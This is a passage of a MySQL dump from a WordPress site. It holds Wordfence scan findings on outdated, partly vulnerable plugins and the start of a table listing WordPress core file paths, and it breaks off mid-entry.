notifications. <cite>By <a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://wpcerber.com\">Cerber Tech Inc.</a>\";s:9:\"AuthorURI\";s:20:\"https://wpcerber.com\";s:10:\"TextDomain\";s:9:\"wp-cerber\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:83:\"<a href=\"https://wpcerber.com\">WP Cerber Security, Anti-spam &amp; Malware Scan</a>\";s:10:\"AuthorName\";s:16:\"Cerber Tech Inc.\";s:9:\"wpRemoved\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/081a5fda-abe2-4f20-bea2-3f7dd3c3a6cf\";}'),(78175,1675160551,1675160551,'new','wfPluginUpgrade',100,'d5c7572b0009b28bea4869a658a09c6f','d5c7572b0009b28bea4869a658a09c6f','The Plugin \"All In One WP Security\" needs an upgrade (4.4.11 -> 5.1.4).','You need to upgrade \"All In One WP Security\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:22:\"All In One WP Security\";s:9:\"PluginURI\";s:71:\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\";s:7:\"Version\";s:6:\"4.4.11\";s:11:\"Description\";s:153:\"All round best WordPress security plugin! <cite>By <a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>.</cite>\";s:6:\"Author\";s:94:\"<a href=\"https://www.tipsandtricks-hq.com/\">Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy</a>\";s:9:\"AuthorURI\";s:33:\"https://www.tipsandtricks-hq.com/\";s:10:\"TextDomain\";s:35:\"all-in-one-wp-security-and-firewall\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"5.0\";s:11:\"RequiresPHP\";s:3:\"5.6\";s:9:\"UpdateURI\";s:66:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\";s:5:\"Title\";s:108:\"<a href=\"https://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin\">All In One WP Security</a>\";s:10:\"AuthorName\";s:46:\"Tips and Tricks HQ, Peter Petreski, Ruhul, Ivy\";s:10:\"pluginFile\";s:105:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php\";s:10:\"newVersion\";s:5:\"5.1.4\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"wpURL\";s:65:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/ce340b88-cbab-4ba8-93ae-8790f2348456\";}'),(78176,1675160551,1675160551,'new','wfPluginUpgrade',50,'43cb6332c8485b3a49303662949bfc64','43cb6332c8485b3a49303662949bfc64','The Plugin \"Disable Gutenberg\" needs an upgrade (2.6 -> 2.8.1).','You need to upgrade \"Disable Gutenberg\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:17:\"Disable Gutenberg\";s:9:\"PluginURI\";s:46:\"https://perishablepress.com/disable-gutenberg/\";s:7:\"Version\";s:3:\"2.6\";s:11:\"Description\";s:236:\"Disables Gutenberg Block Editor and restores the Classic Editor and original Edit Post screen. Provides options to enable on specific post types, user roles, and more. <cite>By <a href=\"https://plugin-planet.com/\">Jeff Starr</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"https://plugin-planet.com/\">Jeff Starr</a>\";s:9:\"AuthorURI\";s:26:\"https://plugin-planet.com/\";s:10:\"TextDomain\";s:17:\"disable-gutenberg\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"4.9\";s:11:\"RequiresPHP\";s:6:\"5.6.20\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:78:\"<a href=\"https://perishablepress.com/disable-gutenberg/\">Disable Gutenberg</a>\";s:10:\"AuthorName\";s:10:\"Jeff Starr\";s:10:\"pluginFile\";s:93:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/disable-gutenberg/disable-gutenberg.php\";s:10:\"newVersion\";s:5:\"2.8.1\";s:4:\"slug\";s:17:\"disable-gutenberg\";s:5:\"wpURL\";s:47:\"https://wordpress.org/plugins/disable-gutenberg\";s:10:\"vulnerable\";b:0;}'),(78177,1675160551,1675160551,'new','wfPluginUpgrade',50,'0299bfbf56d2a15262faf3381e33f60c','0299bfbf56d2a15262faf3381e33f60c','The Plugin \"Insert Headers and Footers\" needs an upgrade (1.6.0 -> 2.0.6).','You need to upgrade \"Insert Headers and Footers\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:26:\"Insert Headers and Footers\";s:9:\"PluginURI\";s:26:\"http://www.wpbeginner.com/\";s:7:\"Version\";s:5:\"1.6.0\";s:11:\"Description\";s:149:\"Allows you to insert code or text in the header or footer of your WordPress blog <cite>By <a href=\"http://www.wpbeginner.com/\">WPBeginner</a>.</cite>\";s:6:\"Author\";s:51:\"<a href=\"http://www.wpbeginner.com/\">WPBeginner</a>\";s:9:\"AuthorURI\";s:26:\"http://www.wpbeginner.com/\";s:10:\"TextDomain\";s:26:\"insert-headers-and-footers\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"4.6\";s:11:\"RequiresPHP\";s:3:\"5.2\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:67:\"<a href=\"http://www.wpbeginner.com/\">Insert Headers and Footers</a>\";s:10:\"AuthorName\";s:10:\"WPBeginner\";s:10:\"pluginFile\";s:89:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/insert-headers-and-footers/ihaf.php\";s:10:\"newVersion\";s:5:\"2.0.6\";s:4:\"slug\";s:26:\"insert-headers-and-footers\";s:5:\"wpURL\";s:56:\"https://wordpress.org/plugins/insert-headers-and-footers\";s:10:\"vulnerable\";b:0;}'),(78178,1675160551,1675160551,'new','wfPluginUpgrade',50,'8ce8e267edace16dc8ad3cca6b5f6868','8ce8e267edace16dc8ad3cca6b5f6868','The Plugin \"Redirection\" needs an upgrade (5.2.3 -> 5.3.9).','You need to upgrade \"Redirection\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:11:\"Redirection\";s:9:\"PluginURI\";s:23:\"https://redirection.me/\";s:7:\"Version\";s:5:\"5.2.3\";s:11:\"Description\";s:81:\"Manage all your 301 redirects and monitor 404 errors <cite>By John Godley.</cite>\";s:6:\"Author\";s:11:\"John Godley\";s:9:\"AuthorURI\";s:0:\"\";s:10:\"TextDomain\";s:11:\"redirection\";s:10:\"DomainPath\";s:7:\"/locale\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:49:\"<a href=\"https://redirection.me/\">Redirection</a>\";s:10:\"AuthorName\";s:11:\"John Godley\";s:10:\"pluginFile\";s:81:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/redirection/redirection.php\";s:10:\"newVersion\";s:5:\"5.3.9\";s:4:\"slug\";s:11:\"redirection\";s:5:\"wpURL\";s:41:\"https://wordpress.org/plugins/redirection\";s:10:\"vulnerable\";b:0;}'),(78179,1675160551,1675160551,'new','wfPluginUpgrade',100,'f3317ab6263ec4e58c551d49f60ea93a','f3317ab6263ec4e58c551d49f60ea93a','The Plugin \"Smush\" needs an upgrade (3.9.5 -> 3.12.4).','You need to upgrade \"Smush\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:5:\"Smush\";s:9:\"PluginURI\";s:40:\"http://wordpress.org/plugins/wp-smushit/\";s:7:\"Version\";s:5:\"3.9.5\";s:11:\"Description\";s:223:\"Reduce image file sizes, improve performance and boost your SEO using the free <a href=\"https://wpmudev.com/\">WPMU DEV</a> WordPress Smush API. <cite>By <a href=\"https://profiles.wordpress.org/wpmudev/\">WPMU DEV</a>.</cite>\";s:6:\"Author\";s:62:\"<a href=\"https://profiles.wordpress.org/wpmudev/\">WPMU DEV</a>\";s:9:\"AuthorURI\";s:39:\"https://profiles.wordpress.org/wpmudev/\";s:10:\"TextDomain\";s:10:\"wp-smushit\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:60:\"<a href=\"http://wordpress.org/plugins/wp-smushit/\">Smush</a>\";s:10:\"AuthorName\";s:8:\"WPMU DEV\";s:10:\"pluginFile\";s:77:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/wp-smushit/wp-smush.php\";s:10:\"newVersion\";s:6:\"3.12.4\";s:4:\"slug\";s:10:\"wp-smushit\";s:5:\"wpURL\";s:40:\"https://wordpress.org/plugins/wp-smushit\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/64b22728-cb07-48be-94b7-1089156490cd\";}'),(78180,1675160551,1675160551,'new','wfPluginUpgrade',100,'0b8d6c7fb674f2575747d21a5d382c8e','0b8d6c7fb674f2575747d21a5d382c8e','The Plugin \"Wordfence Security\" needs an upgrade (7.5.9 -> 7.8.2).','You need to upgrade \"Wordfence Security\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:18:\"Wordfence Security\";s:9:\"PluginURI\";s:25:\"http://www.wordfence.com/\";s:7:\"Version\";s:5:\"7.5.9\";s:11:\"Description\";s:131:\"Wordfence Security &#8211; Anti-virus, Firewall and Malware Scan <cite>By <a href=\"http://www.wordfence.com/\">Wordfence</a>.</cite>\";s:6:\"Author\";s:49:\"<a href=\"http://www.wordfence.com/\">Wordfence</a>\";s:9:\"AuthorURI\";s:25:\"http://www.wordfence.com/\";s:10:\"TextDomain\";s:9:\"wordfence\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:3:\"3.9\";s:11:\"RequiresPHP\";s:3:\"5.3\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:58:\"<a href=\"http://www.wordfence.com/\">Wordfence Security</a>\";s:10:\"AuthorName\";s:9:\"Wordfence\";s:10:\"pluginFile\";s:77:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/wordfence/wordfence.php\";s:10:\"newVersion\";s:5:\"7.8.2\";s:4:\"slug\";s:9:\"wordfence\";s:5:\"wpURL\";s:39:\"https://wordpress.org/plugins/wordfence\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:94:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/833eb481-4fb4-432e-8e93-3f497ccbf1eb\";}'),(78181,1675160552,1675160552,'new','wfPluginUpgrade',50,'30cfd13ad9a8b10c1b0c2af310a4e363','30cfd13ad9a8b10c1b0c2af310a4e363','The Plugin \"WP Fastest Cache\" needs an upgrade (1.0.0 -> 1.1.0).','You need to upgrade \"WP Fastest Cache\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:16:\"WP Fastest Cache\";s:9:\"PluginURI\";s:46:\"http://wordpress.org/plugins/wp-fastest-cache/\";s:7:\"Version\";s:5:\"1.0.0\";s:11:\"Description\";s:116:\"The simplest and fastest WP Cache system <cite>By <a href=\"http://tr.linkedin.com/in/emrevona\">Emre Vona</a>.</cite>\";s:6:\"Author\";s:58:\"<a href=\"http://tr.linkedin.com/in/emrevona\">Emre Vona</a>\";s:9:\"AuthorURI\";s:34:\"http://tr.linkedin.com/in/emrevona\";s:10:\"TextDomain\";s:16:\"wp-fastest-cache\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:77:\"<a href=\"http://wordpress.org/plugins/wp-fastest-cache/\">WP Fastest Cache</a>\";s:10:\"AuthorName\";s:9:\"Emre Vona\";s:10:\"pluginFile\";s:89:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/wp-fastest-cache/wpFastestCache.php\";s:10:\"newVersion\";s:5:\"1.1.0\";s:4:\"slug\";s:16:\"wp-fastest-cache\";s:5:\"wpURL\";s:46:\"https://wordpress.org/plugins/wp-fastest-cache\";s:10:\"vulnerable\";b:0;}'),(78182,1675160552,1675160552,'new','wfPluginUpgrade',50,'4ddb4414c7495dc0cdae66ed31739796','4ddb4414c7495dc0cdae66ed31739796','The Plugin \"Yoast SEO\" needs an upgrade (18.5.1 -> 20.0).','You need to upgrade \"Yoast SEO\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:9:\"Yoast SEO\";s:9:\"PluginURI\";s:18:\"https://yoa.st/1uj\";s:7:\"Version\";s:6:\"18.5.1\";s:11:\"Description\";s:178:\"The first true all-in-one SEO solution for WordPress, including on-page content analysis, XML sitemaps and much more. <cite>By <a href=\"https://yoa.st/1uk\">Team Yoast</a>.</cite>\";s:6:\"Author\";s:43:\"<a href=\"https://yoa.st/1uk\">Team Yoast</a>\";s:9:\"AuthorURI\";s:18:\"https://yoa.st/1uk\";s:10:\"TextDomain\";s:13:\"wordpress-seo\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"5.8\";s:11:\"RequiresPHP\";s:6:\"5.6.20\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:42:\"<a href=\"https://yoa.st/1uj\">Yoast SEO</a>\";s:10:\"AuthorName\";s:10:\"Team Yoast\";s:10:\"pluginFile\";s:78:\"/home/dailyjolly.co.uk/public_html/wp-content/plugins/wordpress-seo/wp-seo.php\";s:10:\"newVersion\";s:4:\"20.0\";s:4:\"slug\";s:13:\"wordpress-seo\";s:5:\"wpURL\";s:43:\"https://wordpress.org/plugins/wordpress-seo\";s:10:\"vulnerable\";b:0;}'),(78183,1675160552,1675160552,'new','wfThemeUpgrade',50,'d4c113eb74c7102d2789dfe28d4639a3','d4c113eb74c7102d2789dfe28d4639a3','The Theme \"HitMag\" needs an upgrade (1.3.2 -> 1.3.4).','You need to upgrade \"HitMag\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.3.4\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/hitmag.1.3.4.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/hitmag/\";s:4:\"Name\";s:6:\"HitMag\";s:4:\"name\";s:6:\"HitMag\";s:7:\"version\";s:5:\"1.3.2\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfknownfilelist`
--

DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7004 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfknownfilelist`
--

LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wordfence-waf.php'),(5,'wp-activate.php'),(6,'wp-admin/about.php'),(7,'wp-admin/admin-ajax.php'),(8,'wp-admin/admin-footer.php'),(9,'wp-admin/admin-functions.php'),(10,'wp-admin/admin-header.php'),(11,'wp-admin/admin-post.php'),(12,'wp-admin/admin.php'),(13,'wp-admin/async-upload.php'),(14,'wp-admin/authorize-application.php'),(15,'wp-admin/comment.php'),(16,'wp-admin/credits.php'),(17,'wp-admin/css/about-rtl.css'),(18,'wp-admin/css/about-rtl.min.css'),(19,'wp-admin/css/about.css'),(20,'wp-admin/css/about.min.css'),(21,'wp-admin/css/admin-menu-rtl.css'),(22,'wp-admin/css/admin-menu-rtl.min.css'),(23,'wp-admin/css/admin-menu.css'),(24,'wp-admin/css/admin-menu.min.css'),(25,'wp-admin/css/code-editor-rtl.css'),(26,'wp-admin/css/code-editor-rtl.min.css'),(27,'wp-admin/css/code-editor.css'),(28,'wp-admin/css/code-editor.min.css'),(29,'wp-admin/css/color-picker-rtl.css'),(30,'wp-admin/css/color-picker-rtl.min.css'),(31,'wp-admin/css/color-picker.css'),(32,'wp-admin/css/color-picker.min.css'),(33,'wp-admin/css/colors/_admin.scss'),(34,'wp-admin/css/colors/_mixins.scss'),(35,'wp-admin/css/colors/_variables.scss'),(36,'wp-admin/css/colors/blue/colors-rtl.css'),(37,'wp-admin/css/colors/blue/colors-rtl.min.css'),(38,'wp-admin/css/colors/blue/colors.css'),(39,'wp-admin/css/colors/blue/colors.min.css'),(40,'wp-admin/css/colors/blue/colors.scss'),(41,'wp-admin/css/colors/coffee/colors-rtl.css'),(42,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(43,'wp-admin/css/colors/coffee/colors.css'),(44,'wp-admin/css/colors/coffee/colors.min.css'),(45,'wp-admin/css/colors/coffee/colors.scss'),(46,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(47,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(48,'wp-admin/css/colors/ectoplasm/colors.css'),(49,'wp-admin/css/colors/ectoplasm/colors.min.css'),(50,'wp-admin/css/colors/ectoplasm/colors.scss'),(51,'wp-admin/css/colors/light/colors-rtl.css'),(52,'wp-admin/css/colors/light/colors-rtl.min.css'),(53,'wp-admin/css/colors/light/colors.css'),(54,'wp-admin/css/colors/light/colors.min.css'),(55,'wp-admin/css/colors/light/colors.scss'),(56,'wp-admin/css/colors/midnight/colors-rtl.css'),(57,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(58,'wp-admin/css/colors/midnight/colors.css'),(59,'wp-admin/css/colors/midnight/colors.min.css'),(60,'wp-admin/css/colors/midnight/colors.scss'),(61,'wp-admin/css/colors/modern/colors-rtl.css'),(62,'wp-admin/css/colors/modern/colors-rtl.min.css'),(63,'wp-admin/css/colors/modern/colors.css'),(64,'wp-admin/css/colors/modern/colors.min.css'),(65,'wp-admin/css/colors/modern/colors.scss'),(66,'wp-admin/css/colors/ocean/colors-rtl.css'),(67,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(68,'wp-admin/css/colors/ocean/colors.css'),(69,'wp-admin/css/colors/ocean/colors.min.css'),(70,'wp-admin/css/colors/ocean/colors.scss'),(71,'wp-admin/css/colors/sunrise/colors-rtl.css'),(72,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(73,'wp-admin/css/colors/sunrise/colors.css'),(74,'wp-admin/css/colors/sunrise/colors.min.css'),(75,'wp-admin/css/colors/sunrise/colors.scss'),(76,'wp-admin/css/common-rtl.css'),(77,'wp-admin/css/common-rtl.min.css'),(78,'wp-admin/css/common.css'),(79,'wp-admin/css/common.min.css'),(80,'wp-admin/css/customize-controls-rtl.css'),(81,'wp-admin/css/customize-controls-rtl.min.css'),(82,'wp-admin/css/customize-controls.css'),(83,'wp-admin/css/customize-controls.min.css'),(84,'wp-admin/css/customize-nav-menus-rtl.css'),(85,'wp-admin/css/customize-nav-menus-rtl.min.css'),(86,'wp-admin/css/customize-nav-menus.css'),(87,'wp-admin/css/customize-nav-menus.min.css'),(88,'wp-admin/css/customize-widgets-rtl.css'),(89,'wp-admin/css/customize-widgets-rtl.min.css'),(90,'wp-admin/css/customize-widgets.css'),(91,'wp-admin/css/customize-widgets.min.css'),(92,'wp-admin/css/dashboard-rtl.css'),(93,'wp-admin/css/dashboard-rtl.min.css'),(94,'wp-admin/css/dashboard.css'),(95,'wp-admin/css/dashboard.min.css'),(96,'wp-admin/css/deprecated-media-rtl.css'),(97,'wp-admin/css/deprecated-media-rtl.min.css'),(98,'wp-admin/css/deprecated-media.css'),(99,'wp-admin/css/deprecated-media.min.css'),(100,'wp-admin/css/edit-rtl.css'),(101,'wp-admin/css/edit-rtl.min.css'),(102,'wp-admin/css/edit.css'),(103,'wp-admin/css/edit.min.css'),(104,'wp-admin/css/farbtastic-rtl.css'),(105,'wp-admin/css/farbtastic-rtl.min.css'),(106,'wp-admin/css/farbtastic.css'),(107,'wp-admin/css/farbtastic.min.css'),(108,'wp-admin/css/forms-rtl.css'),(109,'wp-admin/css/forms-rtl.min.css'),(110,'wp-admin/css/forms.css'),(111,'wp-admin/css/forms.min.css'),(112,'wp-admin/css/install-rtl.css'),(113,'wp-admin/css/install-rtl.min.css'),(114,'wp-admin/css/install.css'),(115,'wp-admin/css/install.min.css'),(116,'wp-admin/css/l10n-rtl.css'),(117,'wp-admin/css/l10n-rtl.min.css'),(118,'wp-admin/css/l10n.css'),(119,'wp-admin/css/l10n.min.css'),(120,'wp-admin/css/list-tables-rtl.css'),(121,'wp-admin/css/list-tables-rtl.min.css'),(122,'wp-admin/css/list-tables.css'),(123,'wp-admin/css/list-tables.min.css'),(124,'wp-admin/css/login-rtl.css'),(125,'wp-admin/css/login-rtl.min.css'),(126,'wp-admin/css/login.css'),(127,'wp-admin/css/login.min.css'),(128,'wp-admin/css/media-rtl.css'),(129,'wp-admin/css/media-rtl.min.css'),(130,'wp-admin/css/media.css'),(131,'wp-admin/css/media.min.css'),(132,'wp-admin/css/nav-menus-rtl.css'),(133,'wp-admin/css/nav-menus-rtl.min.css'),(134,'wp-admin/css/nav-menus.css'),(135,'wp-admin/css/nav-menus.min.css'),(136,'wp-admin/css/revisions-rtl.css'),(137,'wp-admin/css/revisions-rtl.min.css'),(138,'wp-admin/css/revisions.css'),(139,'wp-admin/css/revisions.min.css'),(140,'wp-admin/css/site-health-rtl.css'),(141,'wp-admin/css/site-health-rtl.min.css'),(142,'wp-admin/css/site-health.css'),(143,'wp-admin/css/site-health.min.css'),(144,'wp-admin/css/site-icon-rtl.css'),(145,'wp-admin/css/site-icon-rtl.min.css'),(146,'wp-admin/css/site-icon.css'),(147,'wp-admin/css/site-icon.min.css'),(148,'wp-admin/css/themes-rtl.css'),(149,'wp-admin/css/themes-rtl.min.css'),(150,'wp-admin/css/themes.css'),(151,'wp-admin/css/themes.min.css'),(152,'wp-admin/css/widgets-rtl.css'),(153,'wp-admin/css/widgets-rtl.min.css'),(154,'wp-admin/css/widgets.css'),(155,'wp-admin/css/widgets.min.css'),(156,'wp-admin/css/wp-admin-rtl.css'),(157,'wp-admin/css/wp-admin-rtl.min.css'),(158,'wp-admin/css/wp-admin.css'),(159,'wp-admin/css/wp-admin.min.css'),(160,'wp-admin/custom-background.php'),(161,'wp-admin/custom-header.php'),(162,'wp-admin/customize.php'),(163,'wp-admin/edit-comments.php'),(164,'wp-admin/edit-form-advanced.php'),(165,'wp-admin/edit-form-blocks.php'),(166,'wp-admin/edit-form-comment.php'),(167,'wp-admin/edit-link-form.php'),(168,'wp-admin/edit-tag-form.php'),(169,'wp-admin/edit-tags.php'),(170,'wp-admin/edit.php'),(171,'wp-admin/erase-personal-data.php'),(172,'wp-admin/export-personal-data.php'),(173,'wp-admin/export.php'),(174,'wp-admin/freedoms.php'),(175,'wp-admin/images/about-header-about.svg'),(176,'wp-admin/images/about-header-credits.svg'),(177,'wp-admin/images/about-header-freedoms.svg'),(178,'wp-admin/images/about-header-privacy.svg'),(179,'wp-admin/images/about-texture.png'),(180,'wp-admin/images/align-center-2x.png'),(181,'wp-admin/images/align-center.png'),(182,'wp-admin/images/align-left-2x.png'),(183,'wp-admin/images/align-left.png'),(184,'wp-admin/images/align-none-2x.png'),(185,'wp-admin/images/align-none.png'),(186,'wp-admin/images/align-right-2x.png'),(187,'wp-admin/images/align-right.png'),(188,'wp-admin/images/arrows-2x.png'),(189,'wp-admin/images/arrows.png'),(190,'wp-admin/images/browser-rtl.png'),(191,'wp-admin/images/browser.png'),(192,'wp-admin/images/bubble_bg-2x.gif'),(193,'wp-admin/images/bubble_bg.gif'),(194,'wp-admin/images/comment-grey-bubble-2x.png'),(195,'wp-admin/images/comment-grey-bubble.png'),(196,'wp-admin/images/date-button-2x.gif'),(197,'wp-admin/images/date-button.gif'),(198,'wp-admin/images/freedom-1.svg'),(199,'wp-admin/images/freedom-2.svg'),(200,'wp-admin/images/freedom-3.svg'),(201,'wp-admin/images/freedom-4.svg'),(202,'wp-admin/images/generic.png'),(203,'wp-admin/images/icons32-2x.png'),(204,'wp-admin/images/icons32-vs-2x.png'),(205,'wp-admin/images/icons32-vs.png'),(206,'wp-admin/images/icons32.png'),(207,'wp-admin/images/imgedit-icons-2x.png'),(208,'wp-admin/images/imgedit-icons.png'),(209,'wp-admin/images/list-2x.png'),(210,'wp-admin/images/list.png'),(211,'wp-admin/images/loading.gif'),(212,'wp-admin/images/marker.png'),(213,'wp-admin/images/mask.png'),(214,'wp-admin/images/media-button-2x.png'),(215,'wp-admin/images/media-button-image.gif'),(216,'wp-admin/images/media-button-music.gif'),(217,'wp-admin/images/media-button-other.gif'),(218,'wp-admin/images/media-button-video.gif'),(219,'wp-admin/images/media-button.png'),(220,'wp-admin/images/menu-2x.png'),(221,'wp-admin/images/menu-vs-2x.png'),(222,'wp-admin/images/menu-vs.png'),(223,'wp-admin/images/menu.png'),(224,'wp-admin/images/no.png'),(225,'wp-admin/images/post-formats-vs.png'),(226,'wp-admin/images/post-formats.png'),(227,'wp-admin/images/post-formats32-vs.png'),(228,'wp-admin/images/post-formats32.png'),(229,'wp-admin/images/privacy.svg'),(230,'wp-admin/images/resize-2x.gif'),(231,'wp-admin/images/resize-rtl-2x.gif'),(232,'wp-admin/images/resize-rtl.gif'),(233,'wp-admin/images/resize.gif'),(234,'wp-admin/images/se.png'),(235,'wp-admin/images/sort-2x.gif'),(236,'wp-admin/images/sort.gif'),(237,'wp-admin/images/spinner-2x.gif'),(238,'wp-admin/images/spinner.gif'),(239,'wp-admin/images/stars-2x.png'),(240,'wp-admin/images/stars.png'),(241,'wp-admin/images/w-logo-blue.png'),(242,'wp-admin/images/w-logo-white.png'),(243,'wp-admin/images/wheel.png'),(244,'wp-admin/images/wordpress-logo-white.svg'),(245,'wp-admin/images/wordpress-logo.png'),(246,'wp-admin/images/wordpress-logo.svg'),(247,'wp-admin/images/wpspin_light-2x.gif'),(248,'wp-admin/images/wpspin_light.gif'),(249,'wp-admin/images/xit-2x.gif'),(250,'wp-admin/images/xit.gif'),(251,'wp-admin/images/yes.png'),(252,'wp-admin/import.php'),(253,'wp-admin/includes/admin-filters.php'),(254,'wp-admin/includes/admin.php'),(255,'wp-admin/includes/ajax-actions.php'),(256,'wp-admin/includes/bookmark.php'),(257,'wp-admin/includes/class-automatic-upgrader-skin.php'),(258,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(259,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(260,'wp-admin/includes/class-bulk-upgrader-skin.php'),(261,'wp-admin/includes/class-core-upgrader.php'),(262,'wp-admin/includes/class-custom-background.php'),(263,'wp-admin/includes/class-custom-image-header.php'),(264,'wp-admin/includes/class-file-upload-upgrader.php'),(265,'wp-admin/includes/class-ftp-pure.php'),(266,'wp-admin/includes/class-ftp-sockets.php'),(267,'wp-admin/includes/class-ftp.php'),(268,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(269,'wp-admin/includes/class-language-pack-upgrader.php'),(270,'wp-admin/includes/class-pclzip.php'),(271,'wp-admin/includes/class-plugin-installer-skin.php'),(272,'wp-admin/includes/class-plugin-upgrader-skin.php'),(273,'wp-admin/includes/class-plugin-upgrader.php'),(274,'wp-admin/includes/class-theme-installer-skin.php'),(275,'wp-admin/includes/class-theme-upgrader-skin.php'),(276,'wp-admin/includes/class-theme-upgrader.php'),(277,'wp-admin/includes/class-walker-category-checklist.php'),(278,'wp-admin/includes/class-walker-nav-menu-checklist.php'),(279,'wp-admin/includes/class-walker-nav-menu-edit.php'),(280,'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),(281,'wp-admin/includes/class-wp-application-passwords-list-table.php'),(282,'wp-admin/includes/class-wp-automatic-updater.php'),(283,'wp-admin/includes/class-wp-comments-list-table.php'),(284,'wp-admin/includes/class-wp-community-events.php'),(285,'wp-admin/includes/class-wp-debug-data.php'),(286,'wp-admin/includes/class-wp-filesystem-base.php'),(287,'wp-admin/includes/class-wp-filesystem-direct.php'),(288,'wp-admin/includes/class-wp-filesystem-ftpext.php'),(289,'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),(290,'wp-admin/includes/class-wp-filesystem-ssh2.php'),(291,'wp-admin/includes/class-wp-importer.php'),(292,'wp-admin/includes/class-wp-internal-pointers.php'),(293,'wp-admin/includes/class-wp-links-list-table.php'),(294,'wp-admin/includes/class-wp-list-table-compat.php'),(295,'wp-admin/includes/class-wp-list-table.php'),(296,'wp-admin/includes/class-wp-media-list-table.php'),(297,'wp-admin/includes/class-wp-ms-sites-list-table.php'),(298,'wp-admin/includes/class-wp-ms-themes-list-table.php'),(299,'wp-admin/includes/class-wp-ms-users-list-table.php